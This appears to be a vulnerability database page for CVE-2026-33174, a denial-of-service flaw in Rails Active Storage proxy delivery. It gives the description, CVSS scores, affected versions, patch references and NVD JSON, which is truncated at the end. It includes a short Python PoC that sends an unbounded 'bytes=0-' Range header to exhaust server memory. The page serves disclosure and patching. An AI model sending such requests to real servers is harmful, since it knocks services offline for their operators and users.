CVE-2026-33174

Description

Active Storage allows users to attach cloud and local files in Rails applications. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, when serving files through Active Storage's proxy delivery mode, the proxy controller loads the entire requested byte range into memory before sending it. A request with a large or unbounded Range header (e.g. `bytes=0-`) could cause the server to allocate memory proportional to the file size, possibly resulting in a DoS vulnerability through memory exhaustion. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* - VULNERABLE

Ruby on Rails < 7.2.3.1

Ruby on Rails < 8.0.4.1

Ruby on Rails < 8.1.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual endpoint)
target_url = "http://example.com/rails/active_storage/disk/proxy/..."

# Malicious Range header requesting the entire file to be loaded into memory
headers = {
    "Range": "bytes=0-"
}

try:
    response = requests.get(target_url, headers=headers)
    print(f"Status Code: {response.status_code}")
    print("Attack sent. Monitor server memory usage.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33174
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33174
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33174/
[4] VulDB https://vuldb.com/cve/CVE-2026-33174
[5] https://github.com/rails/rails/commit/2cd933c366b777f873d4d590127da2f4a25e4ba5
[6] https://github.com/rails/rails/commit/42012eaaa88dfc7d0030161b2bc8074a7bbce92a
[7] https://github.com/rails/rails/commit/8159a9c3de3f27a2bcf2866b8bf9ceb9075e229b
[8] https://github.com/rails/rails/releases/tag/v7.2.3.1
[9] https://github.com/rails/rails/releases/tag/v8.0.4.1
[10] https://github.com/rails/rails/releases/tag/v8.1.2.1
[11] https://github.com/rails/rails/security/advisories/GHSA-r46p-8f7g-vvvg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33174", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:28.630", "lastModified": "2026-03-24T17:55:58.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Active Storage allows users to attach cloud and local files in Rails applications. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, when serving files through Active Storage's proxy delivery mode, the proxy controller loads the entire requested byte range into memory before sending it. A request with a large or unbounded Range header (e.g. `bytes=0-`) could cause the server to allocate memory proportional to the file size, possibly resulting in a DoS vulnerability through memory exhaustion. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch."}, {"lang": "es", "value": "Active Storage permite a los usuarios adjuntar archivos en la nube y locales en aplicaciones Rails. Antes de las versiones 8.1.2.1, 8.0.4.1 y 7.2.3.1, al servir archivos a través del modo de entrega de proxy de Active Storage, el controlador de proxy carga todo el rango de bytes solicitado en la memoria antes de enviarlo. Una solicitud con un encabezado Range grande o ilimitado (por ejemplo, 'bytes=0-') podría hacer que el servidor asigne memoria proporcional al tamaño del archivo, posiblemente resultando en una vulnerabilidad de DoS a través del agotamiento de la memoria. Las versiones 8.1.2.1, 8.0.4.1 y 7.2.3.1 contienen un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.3.1", "matchCriteriaId": "D9DC6CB9-DC6C-4CBB-9806-3936ADBC8F1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4.1", "matchCriteriaId": "FA8791E1-8B96-43F6-A3EC-A7E60D700330"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.2.1", "matchCriteriaId": "978E0135-D14B-41DE-87E4-CF059A23E189"}]}]}], "references": [{"url": "https://github.com/rails/rails/commit/2cd933c366b777f873d4d590127da2f4a25e4ba5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/commit/42012eaaa88dfc7d0030161b2bc8074a7bbce92a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/commit/8159a9c3de3f27a2bcf2866b8bf9ceb9075e229b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/releases/tag/v7.2.3.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/rails/rails/releases/tag/v8.0 ... (truncated)